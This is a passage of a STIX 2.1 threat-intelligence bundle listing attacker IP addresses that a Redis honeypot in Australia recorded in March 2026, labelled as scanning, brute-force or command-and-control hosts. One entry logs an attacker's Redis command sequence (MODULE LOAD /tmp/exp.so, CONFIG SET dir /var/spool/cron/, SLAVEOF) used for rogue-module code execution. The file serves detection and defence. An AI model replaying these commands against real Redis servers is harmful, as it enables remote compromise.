      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '80.94.95.221']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T11:25:15.000Z",
      "valid_until": "2026-04-07T11:25:12.000Z"
    },
    {
      "created": "2026-03-06T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--4f7ef6b7-9f1b-41e9-b948-106781f90dab",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-06T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '173.255.223.124']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T13:25:13.000Z",
      "valid_until": "2026-04-07T13:25:12.000Z"
    },
    {
      "created": "2026-03-06T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=16; ports=6379; cc=FR; asn=12876; asn_org=Scaleway S.a.s.; redis_cmd_hits=0",
      "id": "indicator--e9ab10c0-a3c5-4e64-bd9e-7cbaf071ea44",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-06T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '195.154.200.178']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T13:25:13.000Z",
      "valid_until": "2026-04-07T13:25:12.000Z"
    },
    {
      "created": "2026-03-06T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--5184b425-94b6-4d16-921b-985eab2364ee",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-06T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '39.107.95.100']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T13:25:13.000Z",
      "valid_until": "2026-04-07T13:25:12.000Z"
    },
    {
      "created": "2026-03-06T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=27; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--80633887-0ef6-46c7-acbd-b3337b80a45e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-06T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.62.197.137']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T13:25:13.000Z",
      "valid_until": "2026-04-07T13:25:12.000Z"
    },
    {
      "created": "2026-03-06T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--1ddc5881-668a-4336-8df6-2c65dcbe44c0",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-06T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.62.197.151']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T13:25:13.000Z",
      "valid_until": "2026-04-07T13:25:12.000Z"
    },
    {
      "created": "2026-03-06T15:25:16.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--cc8cddd3-be24-4e32-995f-b0d68677339e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-06T15:25:16.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.96.228.248']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T15:25:16.000Z",
      "valid_until": "2026-04-07T15:25:12.000Z"
    },
    {
      "created": "2026-03-06T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--e9846527-83bc-435a-8ca1-0c5af823b0fb",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-06T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '162.142.125.124']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T16:25:13.000Z",
      "valid_until": "2026-04-07T16:25:12.000Z"
    },
    {
      "created": "2026-03-06T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=SG; asn=132203; asn_org=Tencent Building, Kejizhongyi Avenue; redis_cmd_hits=0",
      "id": "indicator--53afeb5c-80b9-4a0f-b821-720942feb2c1",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-06T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '43.134.0.85']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T16:25:13.000Z",
      "valid_until": "2026-04-07T16:25:12.000Z"
    },
    {
      "created": "2026-03-06T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=19; ports=6379; cc=RU; asn=214664; asn_org=JSC Buduschee; redis_cmd_hits=0",
      "id": "indicator--1351e28d-90c1-4d3b-9013-98c90792cd0b",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-06T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.91.64.7']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T16:25:13.000Z",
      "valid_until": "2026-04-07T16:25:12.000Z"
    },
    {
      "created": "2026-03-06T17:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--4da1ccc1-6ada-4cf0-9f9b-c04c2039dc8f",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-06T17:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '162.142.125.85']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T17:25:10.000Z",
      "valid_until": "2026-04-07T17:25:06.000Z"
    },
    {
      "created": "2026-03-06T17:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--fc83747f-16e6-4a00-be8d-5a9c07e8f3ed",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-06T17:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.94.138.119']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T17:25:10.000Z",
      "valid_until": "2026-04-07T17:25:06.000Z"
    },
    {
      "created": "2026-03-06T17:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0",
      "id": "indicator--a78b4394-5043-4446-84cd-93de69e5053b",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-06T17:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.242.226.6']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T17:25:10.000Z",
      "valid_until": "2026-04-07T17:25:06.000Z"
    },
    {
      "created": "2026-03-06T18:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=FR; asn=51167; asn_org=Contabo GmbH; redis_cmd_hits=0",
      "id": "indicator--89e28b64-6bdc-496f-8fc0-43b636d1d6c9",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-06T18:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '109.199.116.37']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T18:25:13.000Z",
      "valid_until": "2026-04-07T18:25:12.000Z"
    },
    {
      "created": "2026-03-06T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=34; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmds=MODULE LOAD /tmp/exp.so,CONFIG SET dir /tmp/,config set rdbcompression yes,CONFIG SET dbfilename exp.so,config set dir /var/spool/cron/; redis_cmd_hits=0; cmd=\"SLAVEOF NO ONE\"",
      "id": "indicator--4ed52c71-ebcb-48de-b41f-b996ff81f4fb",
      "labels": [
        "command_and_control"
      ],
      "modified": "2026-03-06T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '118.31.76.150']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T19:25:13.000Z",
      "valid_until": "2026-04-07T19:25:06.000Z"
    },
    {
      "created": "2026-03-06T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--cf82854e-2249-47a8-b743-7f218df0a105",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-06T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '13.89.125.18']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T19:25:13.000Z",
      "valid_until": "2026-04-07T19:25:06.000Z"
    },
    {
      "created": "2026-03-06T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--7a58d934-ad32-4697-b07d-ceda43c25226",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-06T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '180.76.52.82']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T19:25:13.000Z",
      "valid_until": "2026-04-07T19:25:06.000Z"
    },
    {
      "created": "2026-03-06T23:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=36352; asn_org=HostPapa; redis_cmd_hits=0",
      "id": "indicator--72c7f504-ebf5-4283-8cfc-40ec47ca5da6",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-06T23:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '107.150.31.215']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-06T23:25:06.000Z",
      "valid_until": "2026-04-07T23:25:06.000Z"
    },
    {
      "created": "2026-03-07T00:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=135089; asn_org=China Telecom; redis_cmd_hits=0",
      "id": "indicator--7d789f6c-f1e0-49b6-80a2-018b39900f22",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T00:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '183.56.219.190']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T00:25:13.000Z",
      "valid_until": "2026-04-08T00:25:12.000Z"
    },
    {
      "created": "2026-03-07T00:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; redis_cmd_hits=0",
      "id": "indicator--a68ba487-2542-45f7-a000-33e5b76e4fbe",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-07T00:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.230.168.12']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T00:25:13.000Z",
      "valid_until": "2026-04-08T00:25:12.000Z"
    },
    {
      "created": "2026-03-07T00:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--6ee4fc8c-2cfb-4fc8-9559-650a496cb91e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T00:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.230.168.137']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T00:25:13.000Z",
      "valid_until": "2026-04-08T00:25:12.000Z"
    },
    {
      "created": "2026-03-07T00:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--e4731af6-be8c-4b94-94c7-bc96ec42e51e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T00:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.230.168.140']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T00:25:13.000Z",
      "valid_until": "2026-04-08T00:25:12.000Z"
    },
    {
      "created": "2026-03-07T02:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=NL; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--26c8844a-27e6-408f-bb09-f0b3f3725be2",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-07T02:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.8.140.238']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T02:25:07.000Z",
      "valid_until": "2026-04-08T02:25:05.000Z"
    },
    {
      "created": "2026-03-07T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--dfa15b68-332d-43d1-a07e-59f2180d97b9",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-07T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '157.230.183.183']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T04:25:13.000Z",
      "valid_until": "2026-04-08T04:25:12.000Z"
    },
    {
      "created": "2026-03-07T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--e8848e25-7800-43de-aff6-217b859228f2",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-07T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.71.103.100']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T04:25:13.000Z",
      "valid_until": "2026-04-08T04:25:12.000Z"
    },
    {
      "created": "2026-03-07T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--e6660cee-766e-4358-9816-e16658b1ff52",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-07T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '18.221.132.46']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T04:25:13.000Z",
      "valid_until": "2026-04-08T04:25:12.000Z"
    },
    {
      "created": "2026-03-07T05:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--aa49eaa6-f158-47e5-980b-74957f135efb",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-07T05:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '138.68.169.168']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T05:25:07.000Z",
      "valid_until": "2026-04-08T05:25:05.000Z"
    },
    {
      "created": "2026-03-07T05:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=101; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd=\"...L...h.|..^=u.w...Ys....curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group\"",
      "id": "indicator--0ef48a76-5771-4d83-832a-c3ac9464f84c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T05:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '16.58.56.214']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T05:25:07.000Z",
      "valid_until": "2026-04-08T05:25:05.000Z"
    },
    {
      "created": "2026-03-07T06:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--56b7b4ba-f5c2-45cc-8f1c-957ea03a6816",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T06:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '157.245.116.189']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T06:25:06.000Z",
      "valid_until": "2026-04-08T06:25:05.000Z"
    },
    {
      "created": "2026-03-07T06:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--985e519a-5be4-4b98-a910-9d05b991a226",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T06:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '48.217.233.154']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T06:25:06.000Z",
      "valid_until": "2026-04-08T06:25:05.000Z"
    },
    {
      "created": "2026-03-07T07:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--726f9f23-61ac-4cc4-ae63-aa9b5bc8f002",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T07:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.102.98.235']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T07:25:13.000Z",
      "valid_until": "2026-04-08T07:25:12.000Z"
    },
    {
      "created": "2026-03-07T07:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--355b72bf-26be-48c3-a722-5b0c0349ff89",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T07:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '205.210.31.172']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T07:25:13.000Z",
      "valid_until": "2026-04-08T07:25:12.000Z"
    },
    {
      "created": "2026-03-07T11:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=25; ports=6379; cc=US; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--c3142f83-ccae-4f0a-95a9-a946df50a7ab",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T11:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.251.13.59']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T11:25:13.000Z",
      "valid_until": "2026-04-08T11:25:12.000Z"
    },
    {
      "created": "2026-03-07T12:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--565e559c-5135-46e3-9adb-2d5e626383ce",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T12:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '3.137.136.201']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T12:25:13.000Z",
      "valid_until": "2026-04-08T12:25:12.000Z"
    },
    {
      "created": "2026-03-07T13:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--e7b6c64f-5775-4151-9835-87cede4c9fe8",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-07T13:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '172.238.160.104']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T13:25:12.000Z",
      "valid_until": "2026-04-08T13:25:12.000Z"
    },
    {
      "created": "2026-03-07T14:25:08.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--3dc5a291-1e5c-4f24-b369-c3534a422583",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T14:25:08.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '220.248.173.137']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T14:25:08.000Z",
      "valid_until": "2026-04-08T14:25:06.000Z"
    },
    {
      "created": "2026-03-07T15:25:08.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=28; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--f0912112-b13a-4795-93f0-3949ae5c98e8",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T15:25:08.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '65.49.1.162']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T15:25:08.000Z",
      "valid_until": "2026-04-08T15:25:07.000Z"
    },
    {
      "created": "2026-03-07T15:25:08.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--d806a66e-799a-48e8-9462-888c98f391da",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-07T15:25:08.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '65.49.1.165']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T15:25:08.000Z",
      "valid_until": "2026-04-08T15:25:07.000Z"
    },
    {
      "created": "2026-03-07T16:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=58466; asn_org=CHINANET Guangdong province network; redis_cmd_hits=0",
      "id": "indicator--e0cee174-a471-4440-a832-52374f832c26",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T16:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '125.88.205.65']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T16:25:06.000Z",
      "valid_until": "2026-04-08T16:25:05.000Z"
    },
    {
      "created": "2026-03-07T17:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=1; ports=6379; cc=HK; asn=23470; asn_org=ReliableSite.Net LLC; redis_cmd_hits=0",
      "id": "indicator--b8ce32ac-dfec-49eb-a4d6-1c075f786ffe",
      "labels": [
        "scanning_host"
      ],
